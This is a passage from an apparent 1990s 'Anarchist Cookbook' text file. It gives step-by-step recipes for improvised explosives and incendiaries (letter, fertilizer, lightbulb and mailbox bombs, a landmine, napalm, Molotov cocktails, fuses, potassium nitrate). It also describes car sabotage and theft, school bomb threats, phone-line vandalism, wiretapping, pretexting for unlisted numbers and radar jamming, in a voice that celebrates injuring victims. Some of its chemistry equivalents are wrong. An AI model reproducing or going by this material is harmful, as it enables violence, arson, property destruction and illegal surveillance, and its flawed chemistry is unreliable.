fillings in a ratio of 75% aluminum to 25% iron. This mixture will burn
violently in a closed space (such as an envelope). This bring us to our next
ingredient...
- Go to the post office and buy an insulated (padded)
envelope. You know, the type that is double
layered... Seperate the layers
and place the mild thermite in the main section, where the letter would
go.
Then place magnesium powder in the outer layer. There is your bomb!!
-
Now to light it... this is the tricky part and hard to explain. Just keep
experimenting until you
get something that works. The fuse is just that
touch explosive I have told you about in another one
of my anarchy files.
You might want to wrap it like a long cigarette and then place it at the top of
the envelope in the outer layer (on top of the powdered magnesium). When the
touch explosive is torn
or even squeezed hard it will ignite the powdered
magnesium (sort of a flash light) and then it will
burn the mild thermite.
If the thermite didn't blow up, it would at least burn the fuck out of your
enemy (it does wonders on human flesh!).
NOW that is REVENGE! -Jolly
Roger-
Index
Paint Bombs by The Jolly Roger
To make a pain bomb you simply need a metal pain can with a refastenable
lid, a nice bright color
paint (green, pink, purple, or some gross color is
perfect!), and a quantity of dry ice. Place the
paint in the can and then
drop the dry ice in. Quicky place the top on and then run like hell! With
some testing you can time this to a science. It depends on the ratio of dry
ice to paint to the size
of the can to how full it is. If you are really
pissed off at someone, you could place it on their
doorstep, knock on the
door, and then run!! Paint will fly all over the place HAHAHA!!
-Jolly
Roger-
Index
Ways to send a car to Hell by The Jolly Roger
There are 1001 ways to destroy a car but I am going to cover only the
ones that are the most fun (for
you), the most destructive (for them), and
the hardest to trace (for the cops).
- Place thermite on the hood, light
it, and watch it burn all the way through the pavement!
- Tape a CO2
bomb to the hood, axel, gas tank, wheel, muffler, etc.)
- Put a tampon,
dirt, sugar (this one is good!), a ping pong ball, or just about anything that
will
dissolve in the gas tank. Plastic deforms and dilutes into gas. The
final result is much harder to
inject into the engine, possibly causing
valve replacement.
- Put potatoes, rocks, banannas, or anything that
will fit, into the tailpipe. Use a broom handle to
stuff 'em up into the
tailpipe.
- Put a long rag into the gas tank and light it...
-
Steal a key, copy it, replace it, and then steal the stereo.
- Break
into the car. Cut a thin metal ruler into a shape like this:
ÚÄÄ¿ (Revised
ill. 4.14)
³ ³
³ ³
³ ³
³ ³
³ ÚÙ
³ À¿
ÀÄÄÙ
Slide it into the outside window and keep pulling it back up until you
catch the lock cable which
should unlock the door. This device is also
called a SLIM JIM. Now get the stereo, equalizer, radar
detector, etc. Now
destroy the inside. (A sharp knife does wonders on the seats!)
Have Fun!
-= Exodus =-
Index
More Ways to Send a Car to Hell by The Jolly Roger
Due to a lot of compliments, I have written an update to file #14. I
have left the original intact.
This expands upon the original idea, and
could be well called a sequal. -----Ex.
How to have phun with someone
else's car. If you really detest someone, and I mean detest, here's a
few
tips on what to do in your spare time. Move the windshield wiper blades, and
insert and glue
tacks. The tacks make lovely designs. If your "friend" goes
to school with you, Just before he comes
out of school. Light a lighter and
then put it directly underneath his car door handle.
Wait...Leave...Listen.
When you hear a loud "shit!", you know he made it to his car in time. Remove
his muffler and pour approximately 1 Cup of gas in it. Put the muffler back,
then wait till their car
starts. Then you have a cigarette lighter. A 30
foot long cigarette lighter.
This one is effective, and any fool can do it.
Remove the top air filter. That's it! Or a oldie but
goodie: sugar in the
gas tank. Stuff rags soaked in gas up the exhaust pipe. Then you wonder why your
"friend" has trouble with his/her lungs. Here's one that takes time and many
friends. Take his/her car
then break into their house and reassemble it, in
their living or bedroom. Phun eh? If you're into
engines, say eeni mine moe
and point to something and remove it.
They wonder why something doesn't
work. There are so many others, but the real good juicy ones come by
thinking hard.
-----------Exodus
Index
Do ya hate school? by The Jolly Roger
- One of my favorites for getting out of a class or two is to call in a
bomb threat. Tell 'em that it
is in a locker. Then they have to check them
all, whilst you can slip away for an hour or two. You can
even place a fake
bomb (in any locker but YOURS!). They might cancel school for a week while they
investigate (of course, you will probably have to make it up in the
summer...). - Get some pure
potassium or pure sodium, put it in a capsule,
and flush it down the toilet (smells awful! Stinks up
the whole school!).
- Use a smoke grenade in the hallway.
- Steal the computer
passwords & keys. Or steal the 80 column cards inside if they are (gag) IBM.
- Make friends with student assistants and have them change your grades
when the teachers hand in
their bubble sheets for the report cards. - Spit
your gum out on the carpet in the library or whatever
and grind it into the
carpet. Watch the janitors cry!
- Draw on lockers or spraypaint on the
building that the principal is a fascist.
- Stick a potato in the
tailpipe of the principal's car.
-Get a virus from The Black Gate BBS,
and infect their computers! Most likely they use WordPerfect,
Excel, and
shit like that.
- USE YOUR IMAGINATION! -= Exodus =-
Index
Phone related vandalism by the Jolly Roger
If you live where there are underground lines then you will be able to
ruin someone's phone life very
easily. All you must do is go to their house
and find the green junction box that interfaces their
line (and possibly
some others in the neighborhood) with the major lines. These can be found just
about anywhere but they are usually underneath the nearest phone pole. Take
a socket wrench and loosen
the nut on the right. Then just take clippers or
a sledge hammer or a bomb and destroy the insides and
pull up their phone
cable. Now cut it into segments so it can't be fixed but must be replaced (There
is a week's worth of work for 'em!!) Another place to phuck with lines is in
new developments. When
houses/apartments/condos are still in the plywood and
dirt stage, the lines are run into junxion
boxes. When the crew goes home
for the day, plan your attack. Just destroy the shit out of the box,
then
replace the cover. Watch em' go nuts as they try to figure out where the line
broke in the walls
!
-= Exodus =-
Index
Highway radar jamming by The Jolly Roger
Most drivers wanting to make better time on the open road will invest in
one of those expensive radar
detectors. However, this device will not work
against a gun type radar unit in which the radar signal
is not present until
the cop has your car in his sights and pulls the trigger. Then it is TOO LATE
for
you to slow down. A better method is to continuously jam any signal with
a radar signal of your own. I
have tested this idea with the cooperation of
a local cop and found that his unit reads random numbers
when my car
approached him. It is suprisingly easy to make a low power radar transmitter. A
nifty
little semiconductor called a Gunn Diode will generate microwaves when
supplied with the 5 to 10 volt
DC and enclosed in the correct size cavity
(resonater). An 8 to 3 terminal regulator can be used to
get this voltage
from a car's 12v system. However, the correct construction and tuning of the
cavity
is difficult without good microwave measurement equipment. Police
radars commonly operate on the K
band at 22 ghz. Or more often on the X band
at 10.525 ghz. most microwave intruder alarms and motion
detectors (mounted
over automatic doors in supermarkets & banks, etc.) contain a Gunn type
transmitter/receiver combination that transmits about 10 kilowatts at 10.525
ghz. These units work
perfectly as jammers. If you cannot get one locally,
write to Microwave Associates in Burlington,
Massachusettes and ask them for
info on 'Gunnplexers' for ham radio use. When you get the unit it may
be
mounted in a plastic box on the dash or in a weather-proff enclosure behind the
PLASTIC grille.
Switch on the power when on an open highway. The unit will
not jam radar to the side or behind the car
so don't go speeding past the
radar trap. An interesting phenomena you will notice is that the drivers
who
are in front of you who are using detectors will hit their brakes as you
approach large metal
signs and bridges. Your signal is bouncing off of these
objects and triggering their radar detectors!
HAVE FUN! -Jolly Roger-
P.S. If you are interested in this sort of thing, get a copy of POPULAR
COMMUNICATIONS. The ads in
there tell you where you can get all kinds of
info on all kinds of neat equipment for all kinds of
neat things!
-=
Exodus =- '94
Index
Smoke Bombs by the Jolly Roger
Here is the recipe for one helluva smoke bomb!
* 4 parts sugar
*
6 parts potassium nitrate (Salt Peter)
Heat this mixture over a LOW
flame until it melts, stirring well. Pour it into a future container and,
before it solidifies, imbed a few matches into the mixture to use as fuses.
One pound of this stuff
will fill up a whole block with thick, white smoke!
-= Exodus =-
Index
Mail Box Bombs by the Jolly Roger
* Two litre bottle of chlorine (must contain sodium hypochlorate)
*
Small amount of sugar
* Small amount of water
Mix all three of these
in equal amounts to fill about 1/10 of the bottle. Screw on the lid and place
in a mailbox. It's hard to believe that such a small explosion will
literally rip the mailbox in half
and send it 20 feet into the air! Be
careful doing this, though, because if you are caught, it is not
up to the
person whose mailbox you blew up to press charges. It is up to the city.
- Exodus -
Index
The easiest way to hotwire cars by the Jolly Roger
Get in the car. Look under the dash. If it enclosed, forget it unless
you want to cut through it. If
you do, do it near the ignition. Once you get
behind or near the ignition look for two red wires. In
older cars red was
the standard color, if not, look for two matched pairs. When you find them,
cross
them and take off!
-Exodus-
Index
How to make Napalm by the Jolly Roger
- Pour some gas into an old bowl, or some kind of container.
-
Get some styrofoam and put it in the gas, until the gas won't eat anymore. You
should have a sticky
syrup.
- Put it on the end of something (don't
touch it!!). The unused stuff lasts a long time!
-Exodus-
Index
How to make a fertilizer bomb by Jolly Roger
Ingredients:
* Newspaper
* Fertilizer (the chemical kind, GREEN
THUMB or ORCHO)
* Cotton
* Diesel fuel
Make a pouch out of the
newspaper and put some fertilizer in it. Then put cotton on top. Soak the
cotton with fuel. Then light and run like you have never ran before! This
blows up 500 square feet so
don't do it in an alley!!
-Exodus-
Index
Tennis Ball Bombs by The Jolly Roger
Ingredients:
* Strike anywhere matches
* A tennis ball
* A
nice sharp knife
* Duct tape
Break a ton of matchheads off. Then cut
a SMALL hole in the tennis ball. Stuff all of the matchheads
into the ball,
until you can't fit any more in. Then tape over it with duct tape. Make sure it
is real
nice and tight! Then, when you see a geek walking down the street,
give it a good throw. He will have
a blast!!
- Exodus -
Index
Diskette Bombs by the Jolly Roger
You need:
* A disk
* Scissors
* White or blue kitchen
matches (they MUST be these colors!)
* Clear nail polish
- Carefully
open up the diskette (3.5" disks are best for this!)
- Remove the cotton
covering from the inside.
- Scrape a lot of match powder into a bowl
(use a wooden scraper, metal might spark the matchpowder!)
- After you
have a lot, spread it evenly on the disk.
- Using the nail polish,
spread it over the match mixture
- Let it dry
- Carefully put
the diskette back together and use the nail polish to seal it shut on the inside
(where it came apart).
- When that disk is in a drive, the drive
head attempts to read the disk, which causes a small fire
(ENOUGH HEAT TO
MELT THE DISK DRIVE AND FUCK THE HEAD UP!!). ahahahahaha! Let the fuckhead try
and fix
THAT!!!
-= Exodus =-
Index
Unlisted Phone Numbers by The Jolly Roger
There are a couple of different ways of doing this. Let's see if this
one will help: Every city has
one or more offices dedicated to assigning
numbers to the telephone wire pairs. These offices are
called DPAC offices
and are available to service reps who are installing or repairing phones. To get
the DPAC number, a service rep would call the customer service number for
billing information in the
town that the number is located in that he is
trying to get the unlisted number of. (Got that?) The
conversation would go
something like this: "Hi, Amarillo, this is Joe from Anytown business office, I
need the DPAC number for the south side of town." This info is usually
passed out with no problems,
so... if the first person you call doesn't have
it, try another. REMEMBER, no one has ANY IDEA who the
hell you are when you
are talking on the phone, so you can be anyone you damn well please!
(heheheheh!) When you call the DPAC number, just tell them that you need a
listing for either the
address that you have, or the name. DPAC DOES NOT
SHOW WHETHER THE NUMBER IS LISTED OR UNLISTED!!
Also, if you're going to
make a habit of chasing numbers down, you might want to check into geting a
criss-cross directory, which lists phone numbers by their addresses. It
costs a couple-a-hundred bux,
but it is well worth it if you have to chase
more than one or two numbers down!
-= Exodus =-
Index
Fuses by The Jolly Roger
You would be surprised how many files are out there that use what falls
under the category of a
"fuse." They assume that you just have a few lying
around, or know where to get them. Well, in some
parts of the country, fuses
are extremely hard to come by... so this file tells you how to make your
own. Both fuses presented here are fairly simple to make, and are fairly
reliable.
SLOW BURNING FUSE(approx. 2 inches per minute)
Materials needed:
* Cotton string or 3 shoelaces
* Potassium
Nitrate or Potassium Chlorate
* Granulated sugar
Procedure:
- Wash the cotton string or showlaces in HOT soapy water, then rinse
with fresh water
- Mix the following together in a glass bowl: 1 part
potassium nitrate or potassium chlorate 1 part
granulated sugar 2 parts hot
water
- Soak strings or shoelaces in this solution
- Twist/braid
3 strands together and allow them to dry - Check the burn rate to see how long
it
actually takes!!
FAST BURNING FUSE(40 inches per minute)
Materials needed:
* Soft cotton string
* fine black powder
(empty a few shotgun shells!)
* shallow dish or pan
Procedure:
- moisten powder to form a paste
- twist/braid 3 strands of
cotton together
- rub paste into string and allow to dry
- Check
the burn rate!!!
Compiled by -= Exodus =-
Index
How to make Potassium Nitrate by The Jolly Roger
Potassium Nitrate is an ingredient in making fuses, among other things.
Here is how you make it:
Materials needed:
* 3.5 gallons of nitrate
bearing earth or other material
* 1/2 cup of wood ashes
* Bucket or
other similar container about 4-5 gallons in volume
* 2 pieces of finely
woven cloth, each a bit bigger than the bottom of the bucket
* Shallow dish
or pan at least as large in diameter as the bucket
* Shallow, heat resistant
container
* 2 gallons of water
* Something to punch holes in the bottom
of the bucket
* 1 gallon of any type of alcohol
* A heat source
*
Paper & tape
Procedure:
- Punch holes on the inside bottom
of the bucket, so that the metal is"puckered" outward from the
bottom
- Spread cloth over the holes from the bottom
- Place wood ashes
on the cloth. Spread it out so that it covers the entire cloth and has about the
same thickness.
- Place 2nd cloth on top of the wood ashes
-
Place the dirt or other material in the bucket
- Place the bucket over
the shallow container. NOTE: It may need support on the bottom so that the
holes on the bottom are not blocked.
- Boil water and pour it over
the earth very slowly. Do NOT pour it all at once, as this will clog the
filter on the bottom.
- Allow water to run through holes into the
shallow dish on the bottom.
- Be sure that the water goes through ALL of
the earth!
- Allow water in dish to cool for an hour or so
-
Carefully drain the liquid in the dish away, and discard the sludge in the
bottom
- Boil this liquid over a fire for at least two hours. Small
grains of salt will form - scoop these
out with the paper as they form
- When the liquid has boiled down to 1/2 its original volume let it sit
- After 1/2 hour, add equal volume of the alcohol; when this mixture is
poured through paper, small
white crystals appear. This is the posassium
nitrate.
Purification:
- Redissolve crystals in small amount of
boiling water
- Remove any crystals that appear
- Pour through
improvised filter then heat concentrated solution to dryness.
- Spread
out crystals and allow to dry
Compiled by -= Exodus =-
Index
--LIGHTBULB BOMBS 2 4.14 -= Exodus =-
An automatic reaction to walking into a dark room is to turn on the
light. This can be fatal, if a
lightbulb bomb has been placed in the
overhead light socket. A lightbulb bomb is surprisingly easy to
make. It
also comes with its own initiator and electric ignition system. On some
lightbulbs, the
lightbulb glass can be removed from the metal base by
heating the base of a lightbulb in a gas flame,
such as that of a blowtorch
or gas stove. This must be done carefully, since the inside of a lightbulb
is a vacuum. When the glue gets hot enough, the glass bulb can be pulled off
the metal base. On other
bulbs, it is necessary to heat the glass directly
with a blowtorch or oxy-acetylene torch. In either
case, once the bulb
and/or base has cooled down to room temperature or lower, the bulb can be filled
with an explosive material, such as black powder. If the glass was removed
from the metal base, it
must be glued back on to the base with epoxy. If a
hole was put in the bulb, a piece of duct tape is
sufficient to hold the
explosive in the in the bulb. Then, after making sure that the socket has no
power by checking with a working lightbulb, all that need be done is to
screw the lightbulb bomb into
the socket. Such a device has been used by
terrorists or assassins with much success, since few people
would search the
room for a bomb without first turning on the light.
Index
Under water igniters by The Jolly Roger
Materials needed:
* Pack of 10 silicon diodes (available at Radio
Shack. you will know you got the right ones if they
are very, very small
glass objects!)
* Pack of matches
* 1 candle
Procedure:
- Light the candle and allow a pool of molten wax to form in the top.
- Take a single match and hold the glass part of a single diode against
the head. Bend the diode pins
around the matchhead so that one wraps in an
upward direction and thensticks out to the side. Do the
same with the other
wire, but in a downward direction. The diodes should now be hugging the
matchhead,
but its wires MUST NOT TOUCH EACH OTHER!
- Dip the
matchhead in wax to give it a water-proof coat. These work underwater
-
repeat to make as many as you want
How to use them:
When these
little dudes are hooked across a 6v battery, the diode reaches what is called
breakdown
voltage. When most electrical components reach this voltage, they
usually produce great amounts of
heat and light, while quickly melting into
a little blob. This heat is enough to ignite a matchhead.
These are
recommended for use underwater, where most other igniters refuse to work. ENJOY!
-Exodus-
Index
Home-brew blast cannon by The Jolly Roger
Materials needed:
* 1 plastic drain pipe, 3 feet long, at least 3
1/2 inches in diameter
* 1 smaller plastic pipe, about 6 inches long, 2
inches in diameter
* 1 large lighter, with fluid refills (this gobbles it
up!)
* 1 pipe cap to fit the large pipe, 1 pipe cap to fit the small pipe
* 5 feet of bellwire
* 1 SPST rocker switch
* 16v polaroid
pot-a-pulse battery
* 15v relay (get this at Radio Shack)
* Electrical
Tape
* One free afternoon
Procedure:
- Cut the bell wire
into three equal pieces, and strip the ends
- Cut a hole in the side of
the large pipe, the same diameter as the small pipe. Thread the hole and
one
end of the small pipe. they should screw together easily.
- Take a piece
of scrap metal, and bend it into an "L" shape, then attach it to the level on
the
lighter:
/------------------------gas switch is here
V
/------
!lighter!!<---metal lever
!!!
!!
Now, every
time you pull the 'trigger' gas should flow freely from the lighter. You may
need to
enlarge the 'gas port' on your lighter, if you wish to be able to
fire more rapidly.
- Connect two wires to the two posts on the switch
- Cut two holes in the side of the smaller tube, one for the switch on
the bottom, and one for the
metal piece on the top. Then, mount the switch
in the bottom, running the wires up and out of the top.
- Mount the
lighter/trigger in the top. Now the switch should rock easily, and the trigger
should
cause the lighter to pour out gas. Re-screw the smaller tube into the
larger one, hold down the
trigger a bit, let it go, and throw a match in
there. If all goes well, you should hear a nice big
'THUD!'
- Get a
hold of the relay, and take off the top.
1---------------
v/
2--------------/<--- the center object is the metal finger inside
3
the relay
cc-------------/
oo----------------4
ii
ll----------------5
Connect (1) to one of the wires coming from the
switch. Connect (2) to (4), and connect (5) to one
side of the battery.
Connect the remaining wire from the switch to the other side of the battery. Now
you should be able to get the relay to make a little 'buzzing' sound when
you flip the switch and you
should see some tiny little sparks.
-
Now, carefully mount the relay on the inside of the large pipe, towards the
back. Screw on the
smaller pipe, tape the battery to the side of the cannon
barrel (yes, but looks aren't everything!)
- You should now be able to
let a little gas into the barrel and set it off by flipping the switch.
- Put the cap on the back end of the large pipe VERY SECURELY. You are
now ready for the first
trial-run!
To Test:
Put something
very, very large into the barrel, just so that it fits 'just right'. Now, find a
strong
guy (the recoil will probably knock you on your ass if you aren't
careful!). Put on a shoulderpad,
earmuffs, and possibly some other
protective clothing (trust the Jolly Roger! You are going to need
it!). Hold
the trigger down for 30 seconds, hold on tight, and hit the switch. With luck
and the
proper adjustments, you should be able to put a frozed orange
through 1/4 or plywood at 25 feet.
Have fun! -Exodus-
Index
Chemical Equivalency list by the Jolly Roger
Acacia..................................................Gum Arabic
Acetic Acid................................................Vinegar
Aluminum Oxide..............................................Alumia
Aluminum Potassium Sulphate...................................Alum
Aluminum Sulfate..............................................Alum
Ammonium Carbonate.......................................Hartshorn
Ammonium Hydroxide.........................................Ammonia
Ammonium Nitrate........................................Salt Peter
Ammonium Oleate.......................................Ammonia Soap
Amylacetate............................................Bananna Oil
Barium Sulfide...........................................Black Ash
Carbon Carbinate.............................................Chalk
Carbontetrachloride.................................Cleaning Fluid
Calcium Hypochloride..............................Bleaching Powder
Calcium Oxide.................................................Lime
Calcium Sulfate...................................Plaster of Paris
Carbonic Acid..............................................Seltzer
Cetyltrimethylammoniumbromide........................Ammonium Salt
Ethylinedichloride.....................................Dutch Fluid
Ferric Oxide.............................................Iron Rust
Furfuraldehyde............................................Bran Oil
Glucose.................................................Corn Syrup
Graphite...............................................Pencil Lead
Hydrochloric Acid....................................Muriatic Acid
Hydrogen Peroxide.........................................Peroxide
Lead
Acetate.........................................Sugar of Lead
Lead
Tero-oxide...........................................Red Lead
Magnesium
Silicate............................................Talc
Magnesium
Sulfate.......................................Epsom Salt
Methylsalicylate..................................Winter Green Oil
Naphthalene..............................................Mothballs
Phenol...............................................Carbolic Acid
Potassium Bicarbonate..............................Cream of Tarter
Potassium Chromium Sulfate..............................Chromealum
Potassium Nitrate.......................................Salt Peter
Sodium Oxide..................................................Sand
Sodium Bicarbonate.....................................Baking Soda
Sodium Borate................................................Borax
Sodium Carbonate......................................Washing Soda
Sodium Chloride...............................................Salt
Sodium Hydroxide...............................................Lye
Sodium Silicate..............................................Glass
Sodium Sulfate......................................Glauber's Salt
Sodium Thiosulfate.............................Photographer's Hypo
Sulfuric Acid.........................................Battery Acid
Sucrose.................................................Cane Sugar
Zinc
Chloride.......................................Tinner's Fluid
Zinc
Sulfate.........................................White Vitriol
Brought to
you in the Anarchist's CookBook 4.14..
-= Exodus =-
Index
Phone Taps by The Jolly Roger
Here is some info on phone taps. In this file is a schematic for a
simple wiretap & instructions for
hooking up a small tape recorder
control relay to the phone line.
First, I will discuss taps a little.
There are many different types of taps. there are transmitters,
wired taps,
and induction taps to name a few. Wired and wireless transmitters must be
physically
connected to the line before they will do any good. Once a
wireless tap is connected to the line,it
can transmit all conversations over
a limited reception range. The phones in the house can even be
modifies to
pick up conversations in the room and transmit them too! These taps are usually
powered
off of the phone line, but can have an external power source. You
can get more information on these
taps by getting an issue of Popular
Communications and reading through the ads. Wired taps, on the
other hand,
need no power source, but a wire must be run from the line to the listener or to
a
transmitter. There are obvious advantages of wireless taps over wired
ones. There is one type of
wireless tap that looks like a normal telephone
mike. All you have to do is replace the original mike
with thisand itwill
transmit all conversations! There is also an exotic type of wired tap known as
the
'Infinity Transmitter' or 'Harmonica Bug'. In order to hook one of
these, it must be installed inside
the phone. When someone calls the tapped
phone & *before* it rings,blows a whistle over the line, the
transmitter
picks up the phone via a relay. The mike on the phone is activated so that the
caller can
hear all of the conversations in the room. There is a sweep tone
test at 415/BUG-1111 which can be
used to detect one of these taps. If one
of these is on your line & the test # sends the correct tone,
you will
hear a click. Induction taps have one big advantage over taps that must be
physically wired
to the phone. They do not have to be touching the phone in
order to pick up the conversation. They
work on the same principle as the
little suction-cup tape recorder mikes that you can get at Radio
Shack.
Induction mikes can be hooked up to a transmitter or be wired.
Here is
an example of industrial espionage using the phone: A salesman walks into an
office & makes a
phone call. He fakes the conversation, but when he
hangs up he slips some foam rubber cubes into the
cradle. The called party
can still hear all conversations in the room. When someone picks up the
phone, the cubes fall away unnoticed. A tap can also be used on a phone to
overhear what your modem is
doing when you are wardialing, hacking, or just
plain calling a bbs (like the White Ruins! Denver,
Colorado! 55 megs online!
Atari! Macintosh! Amiga! Ibm! CALL IT! 303-972-8566! By the way, i did this
ad without the sysops consent or knowledge!).
Here is the schematic:
-------)!----)!(------------->
)!(
Cap ^ )!(
)!(
)!(
)!(
^^^^^---)!(------------->
^ 100K
!
!
____________________
The 100K pot is used for volume. It should be on its
highest
(least resistance) setting if you hook a speaker across the
output. but it should be set on its highest resistance for a tape
recorder or amplifier. You may find it necessary to add another
10 -
40K. The capacitor should be around .47 MFD. It's only
purpose is to prevent
the relay in the phone from tripping &
thinking that you have the phone
off of the hook. the audio output
transformer is available at Radio Shack.
(part # 273-138E for
input). The red & the white wires go to the output
device. You may
want to experiment with the transformer for the best output.
Hooking up a tape recorder relay is easy. Just hook one of the phone
wires (usually red) to the the end of one of the relay & the ther
end just loop around. This bypasses it. It should look like this:
------^^^^^^^^^------------
---------
RELAY^^
(part #275-004
from Radio Shack works fine)
If you think that you line is tapped, the
first thing to do is to physically inspect the line yourself
ESPECIALLY the
phones. You can get mike replacements with bug detectors built in. However, I
would not
trust them too much. It is too easy to get a wrong reading.
For more info:
BUGS AND ELECTRONIC SURVEILANCE from Desert
Publications HOW TO AVOID ELECTRONIC EAVESDROPPING &
PRIVACY INVASION. I
do not remember who this one is from... you might want to try Paladin Press.
-Exodus-
Index
How to make a landmine by The Jolly Roger
First, you need to get a pushbutton switch. Take the wires of it and
connect one to a nine volt
battery connector and the other to a solar
igniter (used for launching model rockets). A very thin
piece of stereo wire
will usually do the trick if you are desperate, but I recommend the igniter.
Connect the other wire of the nine-volt battery to one end of the switch.
Connect a wire from the
switch to the other lead on the solar igniter.
switch-----------battery
\ /
\ /
\ /
\ /
solar igniter
|
|
|
explosive
Now connect the explosive (pipe bomb,
m-80, CO2 bomb, etc.) to the igniter by attaching the fuse to
the igniter
(seal it with scotch tape). Now dig a hole; not too deep but enough to cover all
of the
materials. Think about what direction your enemy will be coming from
and plant the switch, but leave
the button visible (not TOO visible!). Plant
the explosive about 3-5 feet away from the switch because
there will be a
delay in the explosion that depends on how short your wick is, and, if a
homemade wick
is being used, its burning speed. But if you get it right...
and your enemy is close enough.........
BBBBBBBOOOOOOOOOOOOOOOOOOOOOOOOMMMM!
hahahaha
-EXODUS-
Index
A different kind of Molitoff Cocktail by the Jolly Roger
Here is how you do it:
- Get a coke bottle & fill it with
gasoline about half full
- Cram a piece of cloth into the neck of it
nice and tight
- Get a chlorine tablet and stuff it in there. You are
going to have to force it because the tablets
are bigger than the opening of
the bottle.
- Now find a suitable victim and wing it in their direction.
When it hits the pavement or any surface
hard enough to break it, and the
chlorine and gasoline mix..... BOOM!!!!!! Have fun! -Exodus-
Index
Phone Systems Tutorial by The Jolly Roger
To start off, we will discuss the dialing procedures for domestic as
well as international dialing. We
will also take a look at the telephone
numbering plan.
North American Numbering Plan
In North America,
the telephone numbering plan is as follows:
A) a 3 digit Numbering Plan
Area (NPA) code , ie, area code B) a 7 digit telephone # consisting of a 3
digit Central Office (CO) code plus a 4 digit station #
These 10
digits are called the network address or destination code. It is in the format
of:
Area Code Telephone #
--------- -----------
N*X NXX-XXXX
Where: N = a digit from 2 to 9 * = the digit 0 or 1 X = a digit from 0
to 9
Area Codes
Check your telephone book or the seperate
listing of area codes found on many bbs's. Here are the
special area codes
(SAC's):
510 - TWX (USA)
610 - TWX (Canada)
700 - New Service
710 - TWX (USA)
800 - WATS
810 - TWX (USA)
900 - DIAL-IT
Services
910 - TWX (USA)
The other area codes never cross state
lines, therefore each state must have at least one exclusive
NPA code. When
a community is split by a state line, the CO #'s are often interchangeable (ie,
you can
dial the same number from two different area codes).
TWX
(Telex II) consists of 5 teletype-writer area codes. They are owned by Western
Union. These SAC's
may only be reached via other TWX machines. These run at
110 baud (last I checked! They are most
likely faster now!). Besides the TWX
#'s, these machines are routed to normal telephone #'s. TWX
machines always
respond with an answerback. For example, WU's FYI TWX # is (910) 279-5956. The
answerback for this service is "WU FYI MAWA".
If you don't want to
but a TWX machine, you can still send TWX messages using Easylink
[800/325-4112].
However you are gonna have to hack your way onto this one!
700:
700 is currently used by AT&T as a call forwarding
service. It is targeted towards salesmen on the
run. To understand how this
works, I'll explain it with an example. Let's say Joe Q. Salespig works
for
AT&T security and he is on the run chasing a phreak around the country who
royally screwed up an
important COSMOS system. Let's say that Joe's 700 # is
(700) 382-5968. Everytime Joe goes to a new
hotel (or most likely SLEAZY
MOTEL), he dials a special 700 #, enters a code, and the number where he
is
staying. Now, if his boss received some important info, all he would do is dial
(700) 382-5968 and
it would ring wherever Joe last progammed it to. Neat,
huh?
800:
This SAC is one of my favourites since it allows for
toll free calls. INWARD WATS (INWATS), or Inward
Wide Area
Telecommunications Service is the 800 #'s that we are all familiar with. 800 #'s
are set up
in service areas or bands. There are 6 of these. Band 6 is the
largest and you can call a band 6 #
from anywhere in the US except the state
where the call is terminated (that is why most companies have
one 800 number
for the countery and then another one for their state.) Band 5 includes the 48
contiguous states. All the way down to band 1 which includes only the states
contiguous to that one.
Therefore, less people can reach a band 1 INWATS #
than a band 6 #.
Intrastate INWATS #'s (ie, you can call it from only 1
state) always have a 2 as the last digit in the
exchange (ie, 800-NX2-
XXXX). The NXX on 800 #'s represent the area where the business is located. For
example, a # beginning with 800-431 would terminate at a NY CO.
800
#'s always end up in a hunt series in a CO. This means that it tries the first #
allocated to the
company for their 800 lines; if this is busy, it will try
the next #, etc. You must have a minimum of
2 lines for each 800 #. For
example, Travelnet uses a hunt series. If you dial (800) 521-8400, it will
first try the # associated with 8400; if it is busy it will go to the next
available port, etc. INWATS
customers are billed by the number of hours of
calls made to their #.
OUTWATS (OUTWARD WATS): OUTWATS are for making
outgoing calls only. Largecompanies use OUTWATS since
they receive bulk-rate
discounts. Since OUTWATS numbers cannot have incoming calls, they are in the
format of:
(800) *XXX-XXXX
Where * is the digit 0 or 1 (or
it may even be designated by a letter) which cannot be dialed unless
you box
the call. The *XX identifies the type of service and the areas that the company
can call.
Remember:
INWATS + OUTWATS = WATS EXTENDER
900:
This DIAL-IT SAC is a nationwide dial-it service. It is use
for taking television polls and other
stuff. The first minute currently
costs an outrageous 50-85 cents and each additional minute costs
35-85
cents. Hell takes in a lot of revenue this way!
Dial (900) 555-1212 to
find out what is currently on this service.
CO CODES ~~~~~~~~
These identify the switching office where the call is to be routed. The
following CO codes are
reserved nationwide:
555 - directory assistance
844 - time. These are now in!
936 - weather the 976 exchange
950 -
future services
958 - plant test
959 - plant test
970 - plant test
(temporary)
976 - DIAL-IT services
Also, the 3 digit ANI &
ringback #'s are regarded as plant test and are thus reserved. These numbers
vary from area to area.
You cannot dial a 0 or 1 as the first digit
of the exchange code (unless using a blue box!). This is
due to the fact
that these exchanges (000-199) contains all sorts of interesting shit such as
conference #'s, operators, test #'s, etc.
950:
Here are the
services that are currently used by the 950 exchange:
1000 - SPC
1022 -
MCI Execunet
1033 - US Telephone
1044 - Allnet
1066 - Lexitel
1088 - SBS Skyline
These SCC's (Specialized Common Carriers) are
free from fortress phones! Also, the 950 exchange will
probably be phased
out with the introduction of Equal Access
Plant Tests:
These
include ANI, Ringback, and other various tests.
976:
Dial
976-1000 to see what is currently on the service. Also, many bbs's have listings
of these
numbers.
N11 codes: Bell is trying to phase out some of
these, but they still exist in most areas.
011 - international dialing
prefix
211 - coin refund operator
411 - directory assistance
611 -
repair service
811 - business office
911 - EMERGENCY
International Dialing
With International Dialing, the world has
been divided into 9 numbering zones. To make an
international call, you must
first dial: International Prefix + Country code + National #
In North
America, the international dialing prefix is 011 for station-to-station calls.
If you can
dial International #'s directly in your area then you have
International Direct Distance Dialing
(IDDD).
The country code,
which varies from 1 to 3 digits, always has the world numbering zone as the
first
digit. For example, the country code for the United Kingdom is 44,
thus it is in world numbering zone
4. Some boards may contain a complete
listing of other country codes, but here I give you a few:
1 - North America
(US, Canada, etc.)
20 - Egypt
258 - Mozambique
34 - Spain
49 -
Germany
52 - Mexico (southern portion)
7 - USSR
81 - Japan
98 -
Iran (call & hassle those bastards!)
If you call from an area other
than North America, the format is generally the same. For example,
let's say
that you wanted to call the White House from Switzerland to tell the prez that
his numbered
bank account is overdrawn (it happens, you know! ha ha). First
you would dial 00 (the SWISS
international dialing refix), then 1 (the US
country code), followed by 202-456-1414 (the national #
for the White House.
Just ask for Georgy and give him the bad news!)
Also, country code 87 is
reserved for Maritime mobile service, ie, calling ships:
871 - Marisat
(Atlantic)
871 - Marisat (Pacific)
872 - Marisat (Indian)
International Switching:
In North America there are currently 7
no. 4 ESS's that perform the duty of ISC (Inter-nation
Switching Centers).
All international calls dialed from numbering zone 1 will be routed through one
of
